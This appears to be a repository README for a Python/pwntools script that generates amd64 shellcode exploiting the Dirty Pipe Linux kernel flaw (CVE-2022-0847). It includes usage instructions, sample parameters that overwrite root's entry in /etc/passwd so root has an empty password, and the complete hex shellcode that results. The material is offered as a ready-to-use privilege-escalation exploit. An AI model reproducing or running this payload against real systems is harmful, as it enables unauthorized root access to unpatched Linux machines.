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cve_2022_0847_shellcode

Description

This repository contains a Python script (gen_shellcode.py), based on pwntools, to generate a shellcode implementing CVE-2022-0847.
The shellcode is based on this Poc: antx.
I analyzed the code of the PoC and its execution with strace to catch all the system calls required to make the exploit, and at first I wrote a C program that uses syscall.h; it was still not suitable for a shellcode, but it's good for reference, so I shipped it here (tiny_cve-2022-0847.c).
The function which generates the shellcode takes 3 parameters: path of the file to write to, data to write and offset at which data must be written.
An example of generated shellcode, in disassemble format from objdump, can be found in shellcode.asm; it was generated with the following parameters:

  • filename /etc/passwd
  • data :$1$$qRPK7m23GJusamGpoGLby/:0:0::/:/bin/sh\n
  • offset 4

It leaves the root with an empty password.

Usage

$ python gen_shellcode.py 
Usage: gen_shellcode.py filename data offset [verbose (any value here sets verbose to True)]

You can import the function cve_2022_0847, which generates the shellcode, to call it in other scripts, or directly use this script; there is an example_usage function which calls cve_2022_0847 and makes an ELF with the shellcode.
The cve_2022_0847 also performs some basic sanity checks, and it prints what can go wrong with the exploit and the disassembled shellcode if verbose parameter is set.
It returns the assembled shellcode. The main function calls cve_2022_0847 with the command line parameters and prints the resulting shellcode in C-style hex, i.e. without decoding printable bytes. For example:

$ python gen_shellcode.py /etc/passwd ":$1$$qRPK7m23GJusamGpoGLby/:0:0::/:/bin/sh\n" 4
Resulting shellcode:
\x68\x72\x76\x65\x01\x81\x34\x24\x01\x01\x01\x01\x48\xb8\x2f\x65\x74\x63\x2f\x70\x61\x73\x50\x48\x89\xe6\x6a\x9c\x5f\x31\xd2\x31\xc0\x66\xb8\x01\x01\x0f\x05\x48\x83\xec\x10\x48\x89\xe7\x6a\x16\x58\x0f\x05\x6a\x05\x5f\x31\xf6\x66\xbe\x08\x04\x6a\x48\x58\x0f\x05\x49\x89\xc7\x4d\x89\xfe\x6a\x05\x5f\x48\x81\xec\x00\x10\x00\x00\x48\x89\xe6\x31\xd2\xb6\x10\x4d\x85\xff\x74\x0a\x6a\x01\x58\x0f\x05\x49\x29\xd7\xeb\xf1\x4d\x89\xf7\x6a\x04\x5f\x4d\x85\xff\x74\x09\x31\xc0\x0f\x05\x49\x29\xd7\xeb\xf2\x6a\x03\x45\x31\xd2\x6a\x01\x41\x58\x45\x31\xc9\x6a\x03\x5f\x6a\x05\x5a\x48\x89\xe6\x31\xc0\x66\xb8\x13\x01\x0f\x05\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x72\x69\x5d\x6f\x01\x01\x01\x48\x31\x04\x24\x48\xb8\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x50\x48\xb8\x4c\x62\x79\x2f\x3a\x30\x3a\x30\x50\x48\xb8\x75\x73\x61\x6d\x47\x70\x6f\x47\x50\x48\xb8\x50\x4b\x37\x6d\x32\x33\x47\x4a\x50\x48\xb8\x3a\x31\x36\x39\x32\x33\x71\x52\x50\x48\x89\xe6\x6a\x05\x5f\x6a\x2d\x5a\x6a\x01\x58\x0f\x05\x31\xff\x31\xc0\xb0\xe7\x0f\x05

Disclaimer

Supported architecture is only amd64.